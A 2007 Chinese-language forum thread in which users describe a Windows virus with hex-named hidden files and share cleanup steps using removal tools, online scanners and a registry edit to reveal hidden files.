怎么办.没什么大问题吗? 13 newcenturysun - 2007-05-28 23:10 有问题那个东西不能删的

汗死，我也是的。。。。
晕这该怎么办啊？？？
有解决方法吗？？？？

2007-06-01 17:45

从其他机器中拷一个过来

2007-06-01 22:58

俺也是SRENG打不开
咋整?

2007-06-02 04:03

我先用橙色8月专杀工具查一遍，注意不要重启，然后马上到YAHOO助手网站里用金山和瑞星两个免费在线杀毒软件分别查杀一次，最后用EWIDO3.5再查一次，这下总算搞定，网页和NORTON都算是正常了，大家可以试试。
请抓紧时间，免费杀毒只在双休日可以用。

2007-06-02 12:57

哭啊郁闷中.... 这样做完以会会破坏哪些文件呢
我是网吧收费机弄完以后好是好了控制台连不上了晕...

2007-06-02 14:13

请问楼主autoruns这个软件改了名字也打不开啊!!

怎么办啊?

2007-06-02 20:20

我弄完后瑞星个人防火墙打不开了怎磨办?

2007-06-02 20:24

我有个笨的方法

你先找怎么修改注册表之后就能把隐藏文件打开了

然后每个盘里都有那个病毒名字的隐藏文件

删了文件（41115BDD）后

做一个同样名字的文件夹（41115BDD.EXE）

之后就能上网什么的了一步一步来

最后在清干净

2007-06-02 21:35

我也中毒了，而且是两台机子，都是8位的数字+字母，搞了好几天了，头都晕了。按照楼主方法在一天机子上已经搞定了，但是在另外一天机子上出现了新情况。
使用XDelBox 1.2在重启选择运行后，XDelBox不是像搞好的机子上刷刷的一闪就好了，不能删除病毒*****.dll文件，******.dll手动删除后又自动生成。
省略第二步，然后按照楼主的方法一步步做下去（其中不要重新启动机子），所有的步骤做完后，直接从光盘启动重装系统，现在搞定了，都快虚脱了，都亏了楼主的文章啊，谢谢……
其实在一开始时，杀毒软件被自动关闭，安全模式也进入不去，搜索带有毒字的网页就会立即关闭，隐藏文件看不到。在网上搜索到能进入安全模式的程序，在木蚂蚁社区上找到的（木蚂蚁社区 » 网络安全区 » 病毒救援区 » 电脑中毒了（已解决谢谢大家）），需要的朋友可以链接如下：http://bbs.mumayi.net/
隐藏文件可以使用楼主的程序，或是在开始-运行 regedit 打开注册表，在HKEY_LOCAL_MACHINE\software\microsoft\windows\currenversion\explore\advanced\folder\hidden\showall\下面的checkedvalue双击输入数字1（原来为0）

终于可以休息一下了，谢谢楼主

2007-06-03 15:18

很深奥，``看不明。。。。。。。。。

[首页] 1 [2] [3] [4] [下一页]

姓　名：	*姓名最长为50字节

网址或邮箱：	(选填)

内　容：

验证码：	看不清?